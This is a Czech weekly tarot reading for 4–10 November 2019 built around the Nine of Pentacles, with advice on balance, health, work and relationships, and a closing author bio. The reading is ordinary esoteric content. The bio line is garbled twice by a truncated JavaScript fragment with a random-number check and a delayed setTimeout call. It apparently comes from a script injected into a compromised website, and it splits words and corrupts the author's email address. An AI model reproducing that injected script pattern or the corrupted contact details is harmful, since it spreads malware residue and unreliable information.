Ezoterika, Magie,  Tarot

Týdenní čtení z tarotových karet: 4. listopadu – 10. listopadu 2019

Karta týdne: Devítka mincí

Týdenní karta naznačuje, že si budete budovat (nebo chtít vybudovat) větší pocit bezpečí a důvěry, který rozpustí všechny vaše pochybnosti a obavy. Za vašeho skutečně důsledného, klidného, ale navzdory tomu aktivního přispění byste mohli být tento týden docela spokojeni. Rovnováha bude teď velmi důležitá, a to ve všech oblastech života. Měli byste si také umět striktně stanovit, kolik času věnujete své profesi nebo jiným závazkům a povinnostem.
Bude také nutno hlídat si zdraví. Postarejte se důkladně o svůj jídelníček, cvičení a předem naplánovanou dobu na relaxaci. Díky malým pauzám mezi rušnými chvilkami obnovíte vnitřní zdroje energie a budete schopni čelit novým výzvám. Zvýší to rovněž vaši efektivitu a dosažené výsledky budou mnohem přínosnější.
Tento týden můžete pokojně nechat stranou všechny své případné strachy a negativní očekávání, nic závažného vám vskutku nehrozí, naopak. Bude to sedm vynikajících dnů na vytvoření prostoru pro něco lepšího, než jste získali nebo žili dosud. Vaše konstruktivní úsilí bude korunováno úspěchem, jenom nezanedbávejte spojení svých sil s ostatními lidmi kolem. Odhodlání pracovat buďto na sobě nebo na nějakém cíli či plánu vás obohatí o adekvátní „výnosy“. Cestování bude v této době pro vás prospěšné a obohacující.

Výzva Devítky mincí na tento týden:
Buďte vstřícní k jiným, v dalších týdnech se vám vaše vstřícnost bude mnohonásobně rentovat. Na druhé straně, nesvěřujte se s jakýmikoli svými plány a úmysly leckomu, zejména však se záměry a nápady pracovního rázu. Buďte taktéž opatrní při řešení zdánlivě nepodstatných záležitosti. Týkají-li se vašich osobních vztahů, o to víc.
Snažte se pokaždé plně porozumět celkovému rozsahu všeho, co se vám postaví do cesty, nebo co v tomto týdnu zažijete. Nepochopení těchto událostí či situací může totiž způsobit nedorozumění s jinými osobami.
Co se týče vašich užších vztahů, neměli byste být příliš formální nebo odtažití. Snažte se spíš mírně a trpělivě vyjadřovat vaše skutečné pocity. A ještě něco, věnujte víc pozornosti svým blízkým.

Judita Katona Peschlová, zkušená kartářka, psychoterapeutka, terapeutka andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andělské terapie a lektorka rodinných konstelací, žurnalistka a spisovatelka; www.angelcity.cz, judita.andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andele@gmail.com